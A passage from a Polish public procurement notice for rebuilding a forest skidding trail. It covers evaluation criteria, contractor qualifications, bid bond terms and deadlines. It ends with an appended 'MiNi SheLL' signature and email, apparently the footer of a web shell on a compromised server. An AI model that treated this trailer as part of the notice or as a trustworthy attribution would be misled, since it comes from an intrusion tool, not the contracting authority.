dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą<br/>oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą.<br/>1) Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta<br/>otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym terminie, pisemnej zgody na wybór jego oferty.<br/>2) W przypadku braku zgody, o której mowa w ppkt. 1), Zamawiający zwróci się o wyrażenie takiej zgody do kolejnego Wykonawcy,<br/>którego oferta została najwyżej oceniona, chyba że zajdą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia za wady na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, dotyczące:<br/><br/>1) Zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie określa wymagań w zakresie spełnienia tego warunku. <br/><br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie określa wymagań w zakresie spełnienia tego warunku.<br/><br/>3) Sytuacji ekonomicznej lub finansowej:<br/><br/>Wykonawca spełni warunek dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże:<br/><br/>a)	posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej <br/>500000,00 zł.<br/><br/><br/>4) Zdolności technicznej lub zawodowej:<br/><br/>4.1) Warunek ten, w zakresie doświadczenia, zostanie uznany, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej 2 (dwie) odrębne roboty budowlane obejmujące wykonanie robót w zakresie nawierzchni dróg o wartości min: 500000,00 zł każda.<br/><br/>-W przypadku robót, których wartość została wyrażona w umowie, w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN, przy zastosowaniu średniego kursu NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/><br/>4.2). Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany, jeżeli Wykonawca wykaże, że dysponuje : <br/>Co najmniej 1(jedną) osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności inżynieryjnej- drogowej lub równoważnej bez ograniczeń niezbędnymi do wykonania zamówienia zgodnie z ustawą z dnia 07.07.1994 Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 ze zm.) lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający dopuszcza uprawnienia wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>Kierownik budowy/kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą <br/>z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia <br/>29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wstępne, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp.<br/>1) Wykonawca do oferty dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu – wg<br/>wzoru stanowiącego załącznik nr 4 do SWZ, potwierdzające brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu, odpowiednio na dzień składania ofert.<br/>2) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, przedmiotowe oświadczenie składa każdy z<br/>Wykonawców. Oświadczenie te potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z<br/>własnym oświadczeniem, o którym mowa w ppkt. 1), także oświadczenie podmiotu udostępniającego zasoby (wg załącznika nr 4a<br/>do SWZ), potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim Wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych.<br/>1) Wykaz dokumentów i oświadczeń, które Wykonawca składa w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu:<br/>a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane – wzór wykazu stanowi załącznik nr 6 do SWZ, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>(Uwaga: jeżeli Wykonawca powołuje się doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi<br/>Wykonawcami wykaz powinien dotyczyć robót budowlanych,<br/>w których wykonaniu Wykonawca ten bezpośrednio uczestniczył),<br/>Ogłoszenie nr 2024/BZP 00351668/01 z dnia 2024-06-05<br/>2024-06-05 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór wykazu stanowi załącznik nr 7 do SWZ.<br/>2) Wykaz dokumentów i oświadczeń, które Wykonawca składa w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia<br/>braku podstaw wykluczenia:<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa<br/>w art. 108 ust. 1 ustawy Pzp – wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>Pozostałe Informacja o podmiotowych środkach dowodowych<br/>oraz innych dokumentach lub oświadczeniach zawiera rozdział VI SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest do:<br/>1) przedłożenia umowy regulującej zasady współpracy Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(jeśli dotyczy),<br/>2) przedłożenia dokumentów dotyczących osób wskazanych w ofercie na stanowisko Kierownika budowy/Kierowników<br/>robót:<br/>- potwierdzających posiadanie uprawnień budowlanych do kierowania robotami w wymaganych specjalnościach oraz<br/>przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa lub inne równoważne dokumenty,<br/>3) wniesienia wymaganego zabezpieczenia należytego wykonania umowy,<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy.<br/>5. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577<br/>ustawy Pzp, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli<br/>zawiadomienie to zostało przesłane przy użyciu środków komunikacji elektronicznej.<br/>6. Zamawiający może zawrzeć umowę przed upływem terminu, o którym mowa w pkt. 5, jeżeli<br/>w postępowaniu złożono tylko jedną ofertę.<br/>7. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.<br/>Wykonawca zobowiązany jest przed upływem terminu składania ofert do wniesienia wadium <br/>w wysokości: <br/><br/>7000,00 zł<br/><br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego w BANKU SPÓŁDZIELCZYM WĘGIERSKA GÓRKA nr 33 8131 0005 0000 1094 2000 0010 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Przebudowa - modernizacja stałego szlaku zrywkowego Na Wojtatówkę”<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia <br/> 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/><br/>3. W przypadku wadium wnoszonego w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/> <br/>Gwarancja lub poręczenie powinny zawierać następujące elementy:<br/>a) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp,<br/>b) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>c) powinno być nieodwołalne i bezwarunkowe,<br/>d) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą <br/>(z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>e) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>f) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/ poręczyciela oraz wskazanie ich siedzib; Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zamawiajacy,<br/>g) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>h) kwotę gwarancji/poręczenia.<br/><br/>4. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy przed upływem terminu składania ofert rachunek bankowy Zamawiającego zostanie uznany kwotą wadium. W wymienionym przypadku Wykonawca winien załączyć do oferty kopię polecenia przelewu.<br/><br/>5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>6. Wadium utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w pkt. 7 ppkt. 2) i 3) oraz pkt. 8.<br/><br/>Pozostałe informacje dotyczące wadium znajdują się w dokumentach postępowania (SWZ) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wraz z załącznikami winna zawierać:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie niniejszego zamówienia publicznego,<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie<br/>o którym mowa w art. 117 ust. 4 ustawy Pzp – wg załącznika nr 10.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden<br/>z Wykonawców nie może podlegać wykluczeniu z postępowania.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest do:<br/>1) przedłożenia umowy regulującej zasady współpracy Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Korespondencja związana z postępowaniem będzie kierowana do ustanowionego pełnomocnika.<br/>2) Jeżeli oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana,<br/>Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych<br/>Wykonawców.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają<br/>poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana niniejszej umowy może nastąpić wyłącznie za obopólną zgodą stron, w formie pisemnej pod rygorem<br/>nieważności, z zastrzeżeniem ust. 2.<br/>2. Zmiana umowy może nastąpić w następujących przypadkach:<br/>1) opisanych w poprzedzających paragrafach umowy,<br/>2) wskazanych w ustawie - Prawo zamówień publicznych,<br/>3) co do zmiany terminu wykonania umowy w razie:<br/>a. zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy – o ilość dni zawieszenia<br/>robot,<br/>b. wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności<br/>a za które odpowiedzialności nie ponosi Wykonawca – o ilość dni nie wykonywania umowy z powodu wskazanych<br/>okoliczności,<br/>c. konieczności zaspokojenia roszczeń lub oczekiwań osób trzecich, uniemożliwiających wykonanie prac, które to działania<br/>nie są konsekwencją winy którejkolwiek ze stron – o ilość dni nie wykonywania robót z powodu wskazanych okoliczności,<br/>d. wystąpienia zdarzeń siły wyższej – o ilość dni przerwy w wykonywaniu robót spowodowanej siłą wyższą (tj. przez<br/>okoliczności nadzwyczajne, nieprzewidywalne bądź też niemożliwe do uniknięcia mimo możliwości ich przewidzenia, w<br/>szczególności: klęski żywiołowe, katastrofy, zamieszki, epidemie, embarga itp.),<br/>e. konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, na podstawie której realizowana<br/>jest umowa - o ilość dni niezbędną na dokonanie zmian w dokumentacji.<br/>f. w przypadku opóźnień w realizacji przedmiotu zamówienia wynikających z konieczności wykonywania nieprzewidzianych<br/>wcześniej robót budowlanych na terenie budowy, powstałych z przyczyn niezawinionych przez Wykonawcę, w<br/>szczególności w przypadku ujawnienia w trakcie robót urządzeń podziemnych elementów instalacji, konstrukcji, których<br/>istnienie lub lokalizacja były nieujawnione przy opracowywaniu dokumentacji projektowej - o okres tych opóźnień,<br/>g. konieczności wykonania zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego<br/>lub innych zamówień powiązanych, których udzielenie i wykonanie stało się konieczne lub celowe i które mają wpływ na<br/>termin realizacji niniejszego zamówienia,<br/>h. wystąpieniem niezależnych od Wykonawcy przyczyn technologicznych wpływającymi na realizację przedmiotu<br/>zamówienia i przyjęte rozwiązania technologiczne,<br/>i. wystąpieniem okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej<br/>staranności.<br/>3. Strona starająca się o zwolnienie z odpowiedzialności, niezwłocznie po wystąpieniu siły wyższej oraz po powzięciu<br/>wiadomości o jej wpływie na terminowe i prawidłowe wykonanie Umowy, powiadomi na piśmie drugą Stronę o powyższym<br/>zdarzeniu i jego wpływie na jej zdolność do realizacji Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-14 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę należy złożyć w oryginale za pośrednictwem platformy e-zamówienia: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W niniejszym postępowaniu Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy w wysokości<br/>5% ceny oferty brutto.<br/>Informacje ogólne dotyczące realizacji zamówienia:<br/>a) w cenie oferty należy uwzględnić:<br/>- w przypadku korzystania z podwykonawców koordynowanie robót podwykonawców ponosząc<br/>za nich pełną odpowiedzialność;<br/>- wykonywanie prac z uwzględnieniem wszystkich warunków i nakazów wynikających z uzgodnień i zobowiązań<br/>wzajemnych;<br/>- doprowadzenie do należytego stanu i porządku miejsca prowadzenia robót, a także w razie korzystania z dróg,<br/>nieruchomości, obiektów, urządzeń które Wykonawca naruszy w celu realizacji przedmiotu zamówienia,<br/>- naprawienie ewentualnych szkód związanych z prowadzeniem robót wyrządzonych osobom<br/>trzecim lub uszkodzenie mienia;<br/>- koszty wszystkich mediów niezbędnych do realizacji zamówienia (prąd, woda itp.)<br/>- obsługę geodezyjną,<br/>- gospodarowanie odpadami zgodnie z zapisami w przedmiarach i opisach w projekcie;<br/>b) warunki wykonania zamówienia, zobowiązania wykonawcy : wymagania dotyczące robót –<br/>wszystkie prace winny być zrealizowane zgodnie z obowiązującymi przepisami, obowiązującymi normami, warunkami<br/>technicznymi, przepisami bhp, ppoż, wytycznymi SWZ oraz jej pozostałymi załącznikami.

Creat By MiNi SheLL
Email: jattceo@gmail.com